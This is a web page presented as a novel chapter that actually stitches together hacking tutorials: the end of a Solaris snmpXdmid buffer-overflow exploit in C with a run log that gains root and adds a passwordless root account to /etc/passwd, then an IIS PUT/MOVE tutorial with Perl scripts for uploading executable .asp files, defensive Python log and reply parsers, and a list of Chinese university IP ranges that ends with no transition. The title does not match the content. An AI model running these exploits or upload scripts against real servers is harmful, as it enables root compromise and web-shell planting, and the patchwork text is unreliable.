
Section 3. Chinese text processing methods .3

Author: 翟羽佳   Current chapter: 15336 characters   Updated: 2026-6-27 13:03

    }
    memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
  }
  sck=RPC_ANYSOCK;
  if(!(cl=clnttcp_create(&adr,SNMPXDMID_PROG,SNMPXDMID_VERS,&sck,0,0))){
    clnt_pcreateerror("error");exit(-1);
  }
  cl->cl_auth=authunix_create("localhost",0,0,0,NULL);
  i=sizeof(struct sockaddr_in);
  if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
    struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
    ioctl(sck,(('S'<<8)|2),"sockmod");
    nb.maxlen=0xffff;
    nb.len=sizeof(struct sockaddr_in);
    nb.buf=(char*)&adr;
    ioctl(sck,(('T'<<8)|144),&nb);
  }
  n=ntohs(adr.sin_port);
  printf("port=%d connected! ",n);fflush(stdout);
  findsckcode[12+2]=(unsigned char)((n&0xff00)>>8);
  findsckcode[12+3]=(unsigned char)(n&0xff);
  b=&buffer[0];
  for(i=0;i<1248;i++) *b++=pch[i%4];
  for(i=0;i<352;i++) *b++=address[i%4];
  *b=0;
  b=&buffer[10000];
  for(i=0;i<64000;i++) *b++=0;
  for(i=0;i<64000-188;i++) *b++=nop[i%4];
  for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
  for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
  *b=0;
  req.name.len=1200+400+4;
  req.name.val=&buffer[0];
  req.pragma.len=128000+4;
  req.pragma.val=&buffer[10000];
  stat=clnt_call(cl,SNMPXDMID_ADDCOMPONENT,xdr_req,&req,xdr_void,NULL,tm);
  if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);}
  printf("sent!\n");
  write(sck,"/bin/uname -a\n",14);
  while(1){
    fd_set fds;
    FD_ZERO(&fds);
    FD_SET(0,&fds);
    FD_SET(sck,&fds);
    if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
      int cnt;
      char buf[1024];
      if(FD_ISSET(0,&fds)){
        if((cnt=read(0,buf,1024))<1){
          if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
          else break;
        }
        write(sck,buf,cnt);
      }
      if(FD_ISSET(sck,&fds)){
        if((cnt=read(sck,buf,1024))<1){
          if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
          else break;
        }
        write(1,buf,cnt);
      }
    }
  }
}

^D

# gcc -o snmpxdmid snmpxdmid.c -lnsl -lsocket

* Compile the exploit.

snmp.c: In function `main':

snmp.c:135: warning: assignment makes pointer from integer without a cast

snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type

# ./snmpxdmid

* Run the exploit.

copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/

snmpXdmid for solaris 2.7 2.8 sparc

usage: ./snmpxdmid address [-p port] -v 7|8

#./snmpxdmid 127.0.0.29 -v 8

* Overflow.

* Notes:

* address: the target host's IP address.

* [-p port]: the port to overflow.

* -v 7|8: Solaris 2.7 (SunOS 5.7) or Solaris 2.8 (SunOS 5.8)

copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/

snmpXdmid for solaris 2.7 2.8 sparc

adr=0x000c8f68 timeout=30 port=928 connected!

sent!

SunOS business 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250

* The overflow succeeded.

id

uid=0(root) gid=0(root)

* Root privileges obtained.

echo "cnhack::1:0::/:/bin/bash" > /etc/passwd

* Add a user named cnhack with an empty password as an administrator.

telnet localhost

* telnet to the host: 127.0.0.29

Trying 127.0.0.1...

Connected to localhost. Escape character is '^]'.

SunOS 5.8

login: cnhack

Password:

Last login: Sun Jul 29 19:37:19 from 127.0.0.1

Sun Microsystems Inc. SunOS 5.8 Generic February 2000

$

……

Remediation:

1) Rename /etc/rc .d/S dmi to /etc/rc .d/K07dmi (the blank stands for the corresponding run level); then run the command: /etc/init.d/init.dmi stop

2) To be safe, also change the binary's permissions: chmod 000 /usr/lib/dmi/snmpXdmid

『Day 27』Deeper exploitation of IIS write permissions

You may have read 《远程分析IIS设置》 (Remote Analysis of IIS Settings), which analyses the various IIS settings. Here I will look at the IIS write permission specifically. The following is quoted from that article's analysis of the write permission:

Write permission

To test whether a directory is writable by web users, use the following method: telnet to the server's web port (80) and send a request like this:

PUT /dir/my_file.txt HTTP/1.1

Host: iis-server

Content-Length: 10

The server then returns a 100 (Continue) message:

HTTP/1.1 100 Continue

Server: Microsoft-IIS/5.0

Date: Thu, 28 Feb 2002 15:56:00 GMT

Next, we type in 10 letters:

AAAAAAAAAA

After sending this request, look at the server's reply. If it is a 201 Created response:

HTTP/1.1 201 Created

Server: Microsoft-IIS/5.0

Date: Thu, 28 Feb 2002 15:56:08 GMT

Location: http://iis-server/dir/my_file.txt

Content-Length: 0

Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

That means the directory's write permission is enabled. Conversely, if a 403 error comes back, write permission is not enabled. If the server asks you to authenticate and returns a 401 (Unauthorized) response, write permission is enabled but anonymous users are not allowed. If a directory has both "Write" and "Scripts and Executables" enabled, a web user can upload a program and execute it; scary %^#$!~

A brief explanation:

PUT /dir/my_file.txt HTTP/1.1

Host: iis-server

Content-Length: 10

PUT: asks the server to store the enclosed entity at the supplied request URL. If the request URL refers to an already existing resource, the enclosed entity is treated as a modified version of the one residing on the origin server. If the request URL does not point to an existing resource, the user agent defines that URL as a new resource, and the origin server creates the resource under that URL.

Host: the destination host of the HTTP request

Content-Length: the length of the content, i.e. the entity length; this value must equal the size of the uploaded file
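As an added example (not code from this article or from the quoted 《远程分析IIS设置》 article), the following Python parses a captured reply to the PUT probe and turns it into the three verdicts above. It handles the interim 100 Continue that IIS sends before the final status and the folded Allow header, and the sample replies are constructed from the transcripts on this page. It sends nothing itself, so it can be used to review responses already captured while auditing one's own server.

```python
"""Interpret the reply to a PUT write-permission probe.

Added example, not code from the original article: it parses the raw bytes
a server sends back after the PUT request shown above, skips the interim
'100 Continue' response IIS emits before the final status, and maps the final
status code to the outcomes the article lists (201 -> writable, 403 -> write
not enabled, 401 -> write enabled but anonymous users not allowed). The
replies at the bottom are constructed from the article's transcripts.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class ProbeResult:
    status: int
    outcome: str                      # writable / forbidden / auth-required / other
    location: Optional[str] = None    # Location header of a 201 Created
    allow: List[str] = field(default_factory=list)    # methods from the Allow header
    interim: List[int] = field(default_factory=list)  # 1xx codes seen before the final one


def _split_responses(raw: bytes) -> List[List[str]]:
    """Return one list of lines per HTTP head (status line plus headers).

    Bodies, e.g. the HTML of a 403, are dropped because they do not start
    with an HTTP status line. Both CRLF and bare LF line endings are accepted.
    """
    text = raw.decode("latin-1").replace("\r\n", "\n")
    heads = []
    for block in text.split("\n\n"):
        lines = [ln for ln in block.split("\n") if ln]
        if lines and lines[0].startswith("HTTP/"):
            heads.append(lines)
    return heads


def _parse_head(lines: List[str]) -> Tuple[int, Dict[str, str]]:
    """Parse a status line and headers; folded continuation lines are joined."""
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    last = ""
    for line in lines[1:]:
        if line[0] in " \t" and last:         # obs-fold: continuation of previous header
            headers[last] += " " + line.strip()
            continue
        name, _, value = line.partition(":")
        last = name.strip().lower()
        headers[last] = value.strip()
    return status, headers


def classify_put_reply(raw: bytes) -> ProbeResult:
    """Classify the final (non-1xx) response of a PUT probe."""
    interim: List[int] = []
    for lines in _split_responses(raw):
        status, headers = _parse_head(lines)
        if 100 <= status < 200:
            interim.append(status)
            continue
        if status in (200, 201, 204):
            outcome = "writable"
        elif status == 403:
            outcome = "forbidden"
        elif status == 401:
            outcome = "auth-required"
        else:
            outcome = "other"
        allow = [m.strip() for m in headers.get("allow", "").split(",") if m.strip()]
        return ProbeResult(status, outcome, headers.get("location"), allow, interim)
    raise ValueError("no final HTTP status line in reply")


# Constructed sample replies, modelled on the article's transcripts.
REPLY_CREATED = (
    b"HTTP/1.1 100 Continue\r\nServer: Microsoft-IIS/5.0\r\n"
    b"Date: Thu, 28 Feb 2002 15:56:00 GMT\r\n\r\n"
    b"HTTP/1.1 201 Created\r\nServer: Microsoft-IIS/5.0\r\n"
    b"Date: Thu, 28 Feb 2002 15:56:08 GMT\r\n"
    b"Location: http://iis-server/dir/my_file.txt\r\nContent-Length: 0\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,\r\n"
    b" PROPPATCH, SEARCH, LOCK, UNLOCK\r\n\r\n"
)
REPLY_FORBIDDEN = (
    b"HTTP/1.1 100 Continue\r\nServer: Microsoft-IIS/5.0\r\n\r\n"
    b"HTTP/1.1 403 Forbidden\r\nServer: Microsoft-IIS/5.0\r\nConnection: close\r\n"
    b"Content-Type: text/html\r\nContent-Length: 44\r\n\r\n"
    b"<body><h2>HTTP/1.1 403 Forbidden</h2></body>"
)
REPLY_AUTH = b"HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: NTLM\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    for reply in (REPLY_CREATED, REPLY_FORBIDDEN, REPLY_AUTH):
        print(classify_put_reply(reply))
```

The Perl script later on this page keys its success test on `$req[4]`, i.e. on the fifth line of whatever came back; that only works when the reply has exactly the 100 Continue head shown above. Skipping every 1xx head and reading the first final status line, as done here, is the robust way to make that decision.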

Submitting this with nc (or telnet) is tedious, so here we write a simple Perl program to carry out the submission. In the code we open the file with binmode(). The code is as follows:

#!/usr/bin/perl
use IO::Socket;

$ARGC = @ARGV;
if ($ARGC != 4)
{
    print "usage:$0 127.0.0.1 80 kaka.exe /Scripts/file.exe\n";
    exit;
}
$host = $ARGV[0];
$port = $ARGV[1];
$file = $ARGV[2];
$path = $ARGV[3];
@s = stat("$file");
$size = $s[7];                          # get the file size
print "$file size is $size bytes\n";
my $sock = IO::Socket::INET->new(Proto    => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => $port) || die "Sorry! Could not connect to $host \n";
print $sock "PUT $path HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n"; # request headers sent over the socket connection
open(FILE, "$file") || die "Can't open $file";
binmode(FILE);                          # open the file in binary mode
while (read(FILE, $char, 1024)) {       # read the file data and upload it
    print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4] =~ /200|201/) {
    print "upfile Succeed!!!";          # report success
}
else {
    print "upfile faile!!!\n\n";
    print @req;                         # on failure, print the returned error
}
close $sock;
close FILE;

Now let's test it:

C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.txt /Scripts/kaka.txt

kaka.txt size is 14 bytes

please wait...

upfile Succeed!!!

C:\Inetpub\Scripts>dir kaka.txt

驱动器 C 中的卷没有标签。

卷的序列号是 3CD1-479E

C:\Inetpub\Scripts 的目录

2004-05-05 00:37 14 kaka.txt

1 个文件 14 字节

0 个目录 3,871,080,448 可用字节

Here we successfully uploaded kaka.txt to the web directory Scripts. Because the program opens the file with binmode() (binary mode), it should be able to upload other kinds of file as well. Let's first test an exe file:

C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 perl.exe /Scripts/perl.exe

perl.exe size is 20535 bytes

please wait...

upfile Succeed!!!

C:\Inetpub\Scripts>dir perl.exe

驱动器 C 中的卷没有标签。

卷的序列号是 3CD1-479E

C:\Inetpub\Scripts 的目录

2004-05-05 00:42 20,535 perl.exe

1 个文件 20,535 字节

0 个目录 3,871,031,296 可用字节

Success, exe files can be uploaded. Can arbitrary files be uploaded? Next, test an asp file:

C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.asp /Scripts/kaka.asp

kaka.asp size is 4 bytes

please wait...

upfile faile!!!

HTTP/1.1 100 Continue

Server: Microsoft-IIS/5.0

Date: Tue, 04 May 2004 16:45:51 GMT

HTTP/1.1 403 Forbidden

Server: Microsoft-IIS/5.0

Date: Tue, 04 May 2004 16:45:51 GMT

Connection: close

Content-Type: text/html

Content-Length: 44

<body><h2>HTTP/1.1 403 Forbidden</h2></body>

Failed!! It reports an HTTP/1.1 403 Forbidden error, so writing an asp file directly with PUT does not work. Testing shows that every file type IIS itself handles (script-mapped extensions) produces an HTTP/1.1 403 Forbidden error.

So how can we upload a file type that IIS handles? Besides PUT, POST, GET and so on, IIS can also execute COPY and MOVE commands. So we can first upload the local asp file to the remote web directory as a txt (or other) file, then submit a COPY or MOVE command to rename it to asp.

Let's first test this with nc:

D:\>nc 127.0.0.1 80

MOVE /scripts/kaka.txt HTTP/1.1

Host:127.0.0.1

Destination: http://127.0.0.1/scripts/kaka.asp

HTTP/1.1 201 Created

Server: Microsoft-IIS/5.0

Date: Sun, 05 Oct 2003 09:30:59 GMT

Location: http://127.0.0.1/scripts/x.asp

Content-Type: text/xml

Content-Length: 0

We successfully used MOVE to rename /scripts/kaka.txt to /scripts/kaka.asp. This way we can combine PUT and MOVE to write arbitrary files through IIS :). Again we do it in Perl.

Testing the write of an asp file, successful:

C:\usr\bin>perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp

************************************************************

codz by ≯SuperHei<QQ:123230273> && lanker<QQ:18779569>

************************************************************

kaka.asp size is 4 bytes

please wait...

upfile Succeed!!!

Modifyfile Succeed!!!

The final iiswrite.pl code is as follows (this article was written in an Internet cafe; I first drafted the code and lanker tested it and finished it, THX lanker):

#!/usr/bin/perl
#The iiswrite Script
use IO::Socket;

$ARGC = @ARGV;
print "*" x 60;
print "\ncodz by ≯SuperHei<QQ:123230273> && lanker<QQ:18779569>\n";
print "*" x 60, "\n";
if ($ARGC != 4)
{
    print "usage:$0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n";
    exit;
}
$host = $ARGV[0];
$port = $ARGV[1];
$path = $ARGV[3];
$file = $ARGV[2];
@path  = split("/", $path);             # split the target path into components
$any   = pop(@path);                    # drop the final file name
$path1 = join("/", @path);              # directory part of the target path
@s = stat("$file");
$size = $s[7];
print "$file size is $size bytes\n";
# Step 1: PUT the file under a temporary name in the target directory
my $sock = IO::Socket::INET->new(Proto    => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => $port) || die "Sorry! Could not connect to $host \n";
print $sock "PUT $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n";
open(FILE, "$file") || die "Can't open $file";
binmode(FILE);
while (read(FILE, $char, 1024)) {
    print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4] =~ /200|201/) {
    print "upfile Succeed!!!\n";
}
else {
    print "upfile faile!!!\n";
}
close $sock;
close FILE;
# Step 2: MOVE the temporary file to the requested name
$sock = IO::Socket::INET->new(Proto    => "tcp",
                              PeerAddr => $host,
                              PeerPort => $port) || die "Sorry! Could not connect to $host \n";
print $sock "MOVE $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Destination:http://$host:$port$path\n\n\n\n";
@req = <$sock>;
if ($req[0] =~ /20\d/) {                # the original pattern /20\d+|/ matched every reply
    print "Modifyfile Succeed!!!";
}
else {
    print "Modifyfile faile!!!";
}
close $sock;
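From the defender's side, the PUT-then-MOVE sequence that iiswrite.pl performs shows up in the IIS W3C log as two accepted write-class requests from the same client, even though the Destination header itself is not logged. The following Python is an added example, not part of this article or of iiswrite.pl: it parses W3C-format log lines, reports write requests the server accepted or rejected, and pairs each accepted MOVE or COPY with an earlier accepted PUT of the same path by the same client. The log lines and the field subset are constructed for the example; real logs carry more columns.

```python
"""Spot WebDAV write activity in IIS W3C extended log lines.

Added example, not part of the original article: the rename trick described
above (PUT a file as .txt, then MOVE or COPY it to .asp) leaves two log
entries even though the IIS log does not record the Destination header. This
code parses W3C-format lines (column names come from the '#Fields:' directive),
lists write-class requests the server accepted (2xx) or rejected (4xx), and
pairs each accepted MOVE/COPY with an earlier accepted PUT of the same path by
the same client. The log lines are constructed for this example; the field
subset is an assumption, real logs carry more columns.
"""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "PROPPATCH", "MKCOL"}

# Constructed sample log, shaped after the uploads shown in the article.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2004-05-05 00:30:00
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2004-05-05 00:36:10 10.0.0.5 GET /default.htm 200
2004-05-05 00:37:02 10.0.0.9 PUT /Scripts/kaka.txt 201
2004-05-05 00:42:15 10.0.0.9 PUT /Scripts/perl.exe 201
2004-05-05 00:45:51 10.0.0.9 PUT /Scripts/kaka.asp 403
2004-05-05 00:46:30 10.0.0.9 MOVE /Scripts/kaka.txt 201
2004-05-05 00:47:00 10.0.0.5 PUT /dir/notes.txt 401
"""

Row = Dict[str, str]


def parse_w3c(text: str) -> List[Row]:
    """Turn W3C extended log text into dicts keyed by the '#Fields:' names."""
    fields: List[str] = []
    rows: List[Row] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]         # column names for the lines that follow
        elif line.startswith("#") or not line.strip():
            continue                          # other directives and blank lines
        else:
            values = line.split()
            if fields and len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def find_webdav_writes(rows: List[Row]) -> Tuple[List[Row], List[Row], List[Tuple[str, str]]]:
    """Return (accepted writes, rejected writes, PUT-then-MOVE/COPY pairs).

    A pair is (client IP, path): the client first had a PUT of the path
    accepted and later had a MOVE or COPY of that same path accepted, which
    is the shape of an upload that is afterwards renamed to a script extension.
    """
    accepted: List[Row] = []
    rejected: List[Row] = []
    pairs: List[Tuple[str, str]] = []
    puts_by_client: Dict[str, Set[str]] = defaultdict(set)
    for r in rows:
        if r["cs-method"] not in WRITE_METHODS:
            continue
        if r["sc-status"].startswith("2"):
            accepted.append(r)
            if r["cs-method"] == "PUT":
                puts_by_client[r["c-ip"]].add(r["cs-uri-stem"])
            elif r["cs-method"] in ("MOVE", "COPY") and r["cs-uri-stem"] in puts_by_client[r["c-ip"]]:
                pairs.append((r["c-ip"], r["cs-uri-stem"]))
        elif r["sc-status"].startswith("4"):
            rejected.append(r)            # refused attempts are still worth counting
    return accepted, rejected, pairs


if __name__ == "__main__":
    ok, denied, renamed = find_webdav_writes(parse_w3c(SAMPLE_LOG))
    for r in ok:
        print("accepted", r["c-ip"], r["cs-method"], r["cs-uri-stem"], r["sc-status"])
    for r in denied:
        print("rejected", r["c-ip"], r["cs-method"], r["cs-uri-stem"], r["sc-status"])
    for ip, path in renamed:
        print("PUT followed by MOVE/COPY from", ip, "on", path)
```

On the constructed log the PUT of kaka.txt and the later MOVE of the same path from 10.0.0.9 are paired, while the rejected PUTs of kaka.asp (403) and notes.txt (401) are listed separately; the 401 is the "write enabled, anonymous not allowed" case from the quoted article.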

Nationwide IP ranges

Nationwide IP ranges, taken from 追捕 (the Zhuibu IP lookup tool)

010.179.000.000__010.183.255.255__Gansu____
010.184.000.000__010.188.255.255__Qinghai____
010.189.000.000__010.193.255.255__Ningxia____
010.194.000.000__010.198.255.255__Xinjiang____
010.000.000.000__010.001.255.255__Beijing____
010.003.048.000__010.003.050.255__Beijing University of Posts and Telecommunications____
010.011.017.000__010.013.064.255__Tianjin____
010.017.000.000__010.022.255.255__Hebei____
010.023.000.000__010.028.255.255__Shanxi____
010.029.000.000__010.033.255.255__Inner Mongolia____
010.034.000.000__010.041.255.255__Liaoning____
010.042.000.000__010.049.255.255__Jilin____
010.048.000.000__010.051.255.255__Heilongjiang____
010.052.000.000__010.061.255.255__Hubei____
010.062.000.000__010.067.255.255__Hunan____
010.074.000.000__010.081.255.255__Jiangsu____
010.082.000.000__010.088.255.255__Shandong____
010.089.000.000__010.094.255.255__Anhui____
010.103.000.000__010.109.255.255__Zhejiang____
010.110.000.000__010.116.255.255__Fujian____
010.117.000.000__010.122.255.255__Jiangxi____
010.123.000.000__010.130.255.255__Guangdong____
010.131.000.000__010.136.255.255__Hainan____
010.137.000.000__010.142.255.255__Guangxi____
010.143.000.000__010.149.255.255__Sichuan____
010.157.000.000__010.161.255.255__Guizhou____
010.162.000.000__010.166.255.255__Yunnan____
010.172.000.000__010.178.255.255__Shaanxi____
010.167.000.000__010.171.255.255__Tibet____
010.068.000.000__010.073.255.255__Henan____
010.199.000.000__010.253.255.255__Hong Kong____
010.095.000.000__010.102.255.255__Shanghai____
010.002.000.000__010.009.255.255__Beijing____
010.150.000.000__010.156.255.255__Chongqing____
010.000.000.000__010.255.255.255__Unknown region____
202.113.216.000__202.113.223.255__Tianjin Academy of Fine Arts____
202.113.224.000__202.113.239.255__Nankai University____
202.113.242.000__202.113.243.255__Tianjin Economic-Technological Development Area International School____
202.113.244.000__202.113.245.255__Tianjin No. 1 High School____
202.113.248.000__202.113.255.255__Chinese Academy of Medical Sciences____
202.114.000.000__202.114.031.255__Huazhong University of Science and Technology____
202.114.032.000__202.114.047.255__Central China Normal University____
202.114.045.000__202.114.045.255__No. 1 High School Affiliated to Central China Normal University____
202.114.048.000__202.114.063.255__Wuhan Automotive Polytechnic University____
202.114.064.000__202.114.079.255__Wuhan University____
202.114.080.000__202.114.095.255__Wuhan University of Technology____
202.114.096.000__202.114.111.255__Wuhan University of Hydraulic and Electric Engineering____
202.114.112.000__202.114.127.255__Wuhan Technical University of Surveying and Mapping____
202.114.128.000__202.114.143.255__Tongji Medical University____
202.114.144.000__202.114.159.255__Hubei University____
202.114.160.000__202.114.175.255__Wuhan Transportation University____
202.114.176.000__202.114.191.255__Hubei University of Technology____
202.114.192.000__202.114.207.255__China University of Geosciences____
202.114.208.000__202.114.211.255__Wuhan Research Institute of Posts and Telecommunications____
202.114.212.000__202.114.215.255__Huazhong University of Science and Technology____
202.114.216.000__202.114.223.255__Xiangfan University____
202.114.224.000__202.114.239.255__Zhongnan University of Finance and Economics____
202.114.240.000__202.114.255.255__Wuhan University of Science and Technology____
202.115.000.000__202.115.031.255__University of Electronic Science and Technology of China____
202.115.032.000__202.115.047.255__Sichuan Union University____
202.115.048.000__202.115.063.255__Chengdu University of Science and Technology____
202.115.064.000__202.115.079.255__Southwest Jiaotong University____
202.115.080.000__202.115.095.255__Chengdu University____
202.115.096.000__202.115.111.255__West China University of Medical Sciences____
202.115.112.000__202.115.127.255__Southwestern University of Finance and Economics____
202.115.128.000__202.115.143.255__Chengdu Institute of Technology____
202.115.144.000__202.115.159.255__Sichuan Institute of Technology____
202.115.160.000__202.115.175.255__Southwest Institute of Technology____
202.115.176.000__202.115.191.255__Sichuan Agricultural University____
202.115.192.000__202.115.207.255__Sichuan Normal University____
202.115.208.000__202.115.255.255__Sichuan____
202.116.000.000__202.116.031.255__Jinan University (Guangzhou)____
202.116.032.000__202.116.047.255__South China Normal University____
202.116.048.000__202.116.063.255__Guangdong University of Business Studies____
202.116.064.000__202.116.095.255__Sun Yat-sen University____
202.116.096.000__202.116.111.255__Sun Yat-sen Medical University____
202.116.112.000__202.116.127.255__Zhongshan Medical University____
202.116.128.000__202.116.143.255__Guangdong Institute of Technology____
202.116.144.000__202.116.159.255__Guangdong Institute of Mechanical Engineering____
202.116.160.000__202.116.175.255__South China Agricultural University____
202.116.176.000__202.116.191.255__South China Agricultural University____
